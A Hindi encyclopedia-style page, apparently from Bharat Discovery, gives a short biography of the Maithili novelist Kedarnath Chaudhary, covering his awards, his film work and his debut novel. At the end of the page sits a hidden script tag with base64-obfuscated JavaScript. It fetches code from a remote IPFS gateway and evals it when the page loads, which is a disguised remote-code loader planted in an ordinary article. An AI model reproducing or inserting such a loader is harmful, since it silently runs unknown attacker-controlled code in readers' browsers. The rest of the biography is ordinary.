एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "२"।

केदारनाथ चौधरी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

केदारनाथ चौधरी (अंग्रेज़ी: Kedarnath Chaudhary, जन्म- 3 जनवरी, 1936) मैथिली भाषा के प्रसिद्ध उपन्यासकार हैं। मैथिली उपन्यास जगत के श्लाका पुरुष केदारनाथ चौधरी ने अपनी कृति का आधार लोकभाषा को बनाया। इसके कारण उनके उपन्यास के पात्र जेहन में बस जाते हैं। उन्होंने अपनी रचनाएं नई पीढ़ी के नजरिए से लिखीं। केदारबाबू अपने बेहतरीन उपन्यासों के लिए याद किये जाते हैं।

  • वर्ष 2016 के लिए मैथिली भाषा का सर्वोच्च साहित्यिक पुरस्कार 'प्रबोध साहित्य सम्मान' कथाकार केदारनाथ चौधरी को मिला था। शांति निकेतन के प्रोफेसर डॉ. उदय नारायण सिंह नचिकेता की अध्यक्षता में गठित दस सदस्यीय निर्णायक मंडली ने उनके नाम का चयन किया था। मैथिली आंदोलन के अग्रणी नेता प्रबोध नारायण सिंह के नाम पर यह सम्मान 2004 से दिया जा रहा है।
  • केदारनाथ चौधरी का जन्म सन 1936 को हुआ था।
  • सन 1966 में बनी पहली मैथिली फिल्म 'ममता गावय गीत' के वह लेखक-निर्माता रहे।
  • केदारनाथ चौधरी का साहित्य जगत में पदार्पण 2004 में प्रकाशित 'चमेली रानी' उपन्यास से हुआ था।
  • वर्ष 2016 में केदारनाथ चौधरी जी को उनकी रचना 'आवारा नहितन' के लिये 'केदार सम्मान' से पुरस्कृत किया गया था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>